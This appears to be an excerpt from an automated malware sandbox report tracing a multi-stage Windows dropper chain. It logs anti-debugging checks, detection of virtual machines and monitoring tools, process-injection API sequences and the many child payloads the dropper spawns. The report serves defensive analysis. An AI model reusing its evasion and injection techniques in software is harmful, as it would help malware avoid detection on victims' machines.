Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior

Source: rapes.exe, rapes.exe, 0000000F.00000002.3737020284.0000000000F4B000.00000040.00000001.01000000.00000009.sdmp, cuFIzyH.exe, cuFIzyH.exe, 00000010.00000002.2213992169.0000000000E97000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: cuFIzyH.exe, 00000010.00000003.2212662518.0000000001689000.00000004.00000020.00020000.00000000.sdmp, cuFIzyH.exe, 00000010.00000002.2215413900.0000000001689000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW86n
Source: 2Q0510.exe, 0000000B.00000003.1973505983.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp, 2Q0510.exe, 0000000B.00000002.3744249824.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp, 2Q0510.exe, 0000000B.00000002.3744249824.0000000000DAD000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000F.00000002.3742343881.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000F.00000002.3742343881.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, cuFIzyH.exe, 00000010.00000002.2215704935.00000000016DC000.00000004.00000020.00020000.00000000.sdmp, cuFIzyH.exe, 00000010.00000003.2212662518.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, cuFIzyH.exe, 00000010.00000003.2213331364.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, P2SXMuh.exe, 00000017.00000002.2469460631.00000000010A1000.00000004.00000020.00020000.00000000.sdmp, P2SXMuh.exe, 00000017.00000003.2465860963.00000000010F7000.00000004.00000020.00020000.00000000.sdmp, P2SXMuh.exe, 00000017.00000003.2463367942.00000000010F7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: G2C28.exe, 00000001.00000003.1264832369.000000000507A000.00000004.00000020.00020000.00000000.sdmp, 1Z46i3.exe, 00000003.00000002.1314607116.0000000000F6B000.00000040.00000001.01000000.00000005.sdmp, rapes.exe, 00000009.00000002.1343610739.0000000000F4B000.00000040.00000001.01000000.00000009.sdmp, rapes.exe, 0000000A.00000002.1357112694.0000000000F4B000.00000040.00000001.01000000.00000009.sdmp, 2Q0510.exe, 0000000B.00000002.3738721032.0000000000249000.00000040.00000001.01000000.0000000A.sdmp, 2Q0510.exe, 0000000B.00000000.1317900630.0000000000249000.00000080.00000001.01000000.0000000A.sdmp, 2Q0510.exe, 0000000B.00000003.1331993271.0000000004E2A000.00000004.00000800.00020000.00000000.sdmp, 2Q0510.exe, 0000000B.00000001.1318238019.0000000000249000.00000080.00000001.01000000.0000000A.sdmp, rapes.exe, 0000000F.00000002.3737020284.0000000000F4B000.00000040.00000001.01000000.00000009.sdmp, cuFIzyH.exe, 00000010.00000002.2213992169.0000000000E97000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10155390101\cuFIzyH.exe	Thread information set: HideFromDebugger	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\10155390101\cuFIzyH.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\10155390101\cuFIzyH.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\10155390101\cuFIzyH.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\10155390101\cuFIzyH.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\10155390101\cuFIzyH.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\10155390101\cuFIzyH.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\10155390101\cuFIzyH.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\10155390101\cuFIzyH.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\10155390101\cuFIzyH.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\10155390101\cuFIzyH.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\10155390101\cuFIzyH.exe	File opened: SIWVID

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10155390101\cuFIzyH.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10155390101\cuFIzyH.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10155390101\cuFIzyH.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe

Code function: 3_2_050E05B9 rdtsc

3_2_050E05B9

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe

Code function: 11_2_000A9660 LdrInitializeThunk,

11_2_000A9660

Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe

Code function: 17_2_00A88A4E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

17_2_00A88A4E

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\G2C28.exe

1_2_00E2202A

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 15_2_00D7DB60 mov eax, dword ptr fs:[00000030h]	15_2_00D7DB60
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 15_2_00D85FF2 mov eax, dword ptr fs:[00000030h]	15_2_00D85FF2
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00AB11B4 mov edi, dword ptr fs:[00000030h]	17_2_00AB11B4

Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe

Code function: 17_2_00A964CC GetProcessHeap,

17_2_00A964CC

Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Process token adjusted: Debug
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\G2C28.exe	Code function: 1_2_00E26CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_00E26CF0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\G2C28.exe	Code function: 1_2_00E26F40 SetUnhandledExceptionFilter,	1_2_00E26F40
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A88A4E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	17_2_00A88A4E
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A88A42 SetUnhandledExceptionFilter,	17_2_00A88A42
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A90B7E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	17_2_00A90B7E
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A88692 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	17_2_00A88692

Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe

Code function: 17_2_00AB11B4 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

17_2_00AB11B4

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Memory written: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe	Memory written: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\10168750101\ClhN6R8.exe	Memory written: C:\Users\user\AppData\Local\Temp\10168750101\ClhN6R8.exe base: 400000 value starts with: 4D5A

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe

Code function: 15_2_00D58700 ShellExecuteA,Sleep,CreateThread,Sleep,

15_2_00D58700

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10155390101\cuFIzyH.exe "C:\Users\user\AppData\Local\Temp\10155390101\cuFIzyH.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe "C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10166360101\0uzaP1a.exe "C:\Users\user\AppData\Local\Temp\10166360101\0uzaP1a.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe "C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe "C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10168510101\7T7bCyA.exe "C:\Users\user\AppData\Local\Temp\10168510101\7T7bCyA.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10168750101\ClhN6R8.exe "C:\Users\user\AppData\Local\Temp\10168750101\ClhN6R8.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe "C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Process created: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe "C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Process created: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe "C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Process created: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe "C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Process created: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe "C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Process created: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe "C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10166360101\0uzaP1a.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Local\Temp\pack82.vbe"
Source: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe	Process created: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe "C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe"
Source: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe	Process created: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe "C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe"
Source: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe	Process created: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe "C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe"
Source: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe	Process created: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe "C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe"
Source: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe	Process created: C:\Users\user\AppData\Roaming\9OJj7W96hi.exe "C:\Users\user\AppData\Roaming\9OJj7W96hi.exe"
Source: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe	Process created: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe "C:\Users\user\AppData\Roaming\1u58lIqYIC.exe"
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\NpnD5G3qEA.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\1u58lIqYIC.exe "C:\Windows\twain_32\1u58lIqYIC.exe"
Source: C:\Users\user\AppData\Local\Temp\10168750101\ClhN6R8.exe	Process created: C:\Users\user\AppData\Local\Temp\10168750101\ClhN6R8.exe "C:\Users\user\AppData\Local\Temp\10168750101\ClhN6R8.exe"

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\G2C28.exe

Code function: 1_2_00E217EE LoadLibraryA,GetProcAddress,AllocateAndInitializeSid,FreeSid,FreeLibrary,

1_2_00E217EE

Source: cuFIzyH.exe, cuFIzyH.exe, 00000010.00000002.2213992169.0000000000E97000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Program Manager
Source: 1Z46i3.exe, 1Z46i3.exe, 00000003.00000002.1314607116.0000000000F6B000.00000040.00000001.01000000.00000005.sdmp, rapes.exe, rapes.exe, 0000000F.00000002.3737020284.0000000000F4B000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: ^Program Manager

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe

Code function: 15_2_00D79AB5 cpuid

15_2_00D79AB5

Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: GetLocaleInfoW,	17_2_00A958BC
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	17_2_00A9A0E4
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: EnumSystemLocalesW,	17_2_00A9A049
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: GetLocaleInfoW,	17_2_00A9A396
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: EnumSystemLocalesW,	17_2_00A9A337
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: GetLocaleInfoW,	17_2_00A9A4B6
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: EnumSystemLocalesW,	17_2_00A9A46B
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: EnumSystemLocalesW,	17_2_00A95DB7
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	17_2_00A99DF8
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	17_2_00A9A55D
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: GetLocaleInfoW,	17_2_00A9A663

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10155390101\cuFIzyH.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10155390101\cuFIzyH.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10166360101\0uzaP1a.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10166360101\0uzaP1a.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10168510101\7T7bCyA.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10168510101\7T7bCyA.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10168750101\ClhN6R8.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10168750101\ClhN6R8.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10169000101\EJmAkGq.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10169000101\EJmAkGq.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10169690101\c353af48cf.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10169690101\c353af48cf.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10169700101\f86c60eea6.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10169700101\f86c60eea6.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10169710101\f3f3c71039.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10169710101\f3f3c71039.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10169720101\477fbd5c21.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10169720101\477fbd5c21.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10169730101\d151155bf3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10169740101\c881d851ae.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10169740101\c881d851ae.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10169750121\am_no.cmd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10169750121\am_no.cmd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10169760101\ClhN6R8.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10169760101\ClhN6R8.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10169770101\cuFIzyH.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10169770101\cuFIzyH.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10169780101\mAtJWNv.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10169780101\mAtJWNv.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10169790101\ADFoyxP.exe VolumeInformation	Jump to behavior
